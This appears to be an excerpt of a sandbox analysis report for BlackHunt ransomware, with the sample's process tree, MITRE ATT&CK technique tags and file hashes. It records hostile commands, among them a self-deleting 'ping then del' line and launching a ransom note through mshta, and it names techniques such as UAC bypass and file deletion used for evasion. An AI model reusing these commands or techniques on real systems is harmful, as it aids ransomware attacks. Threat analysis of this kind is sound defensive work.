C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3044
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3988
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\03f74755828371d0d8a23f8f3889ccdb7e5f3934fddb5574bd561223d46d1892.exe"2⤵PID:8468
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:12512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:6728 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:13052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13052 -s 14564⤵
- Program crash
PID:8648
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5456
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7340
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5516
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:9040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 13052 -ip 130521⤵PID:13260
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD527f386776d403a080f2192787d7f4e78
SHA1f103c20f5fa7bc39ff8a2cef951276cedb172299
SHA2564f7b5d3b777921cd111f618b16c5db3782266d1e078ac565020965ac7124e7af
SHA5126ffbc532046500bbe6f6683ec22aed6fd29941f3b83bff2ab946fe80379a27761efd564128d9672247ed79cddcb9a7ccfebbce785e24f7f790914e1d17175baa
-
Filesize
684B
MD5b300aaa45f0ae0b18fe7010fc9c1bb08
SHA1aad26e0b25af24e50429a915827554a6ce80039a
SHA256762a46fa2a0d11a5a1554a6f70370e0eea98aa1efbe85b1498e52ee9077fcde3
SHA512a07bc5a8922b25f3fd7c9cfd39c359ec2d335a8d31577efc2c2fe66c8b66208cedba6f9c977720fee907ea0fa85e4a3a9d3cb6f046a50deb32a3c9b36102fb1b
-
Filesize
12KB
MD576fddbd05e757fcccc083d0bb96ea821
SHA13dd494dc20761e5284a16614279044437e4cb8a4
SHA256fb8cd601f661712d8162326d0029f5f99eb52a18116b4c9f62455d4205c51877
SHA512a324743857aaf2ebaa0022fa78e323d83c98f42ae626a2c1903e9e0730f78bd564818163ca4b3ca939fe5153eabb7976a9e557a5a58a9ad9d4355e2febba6cde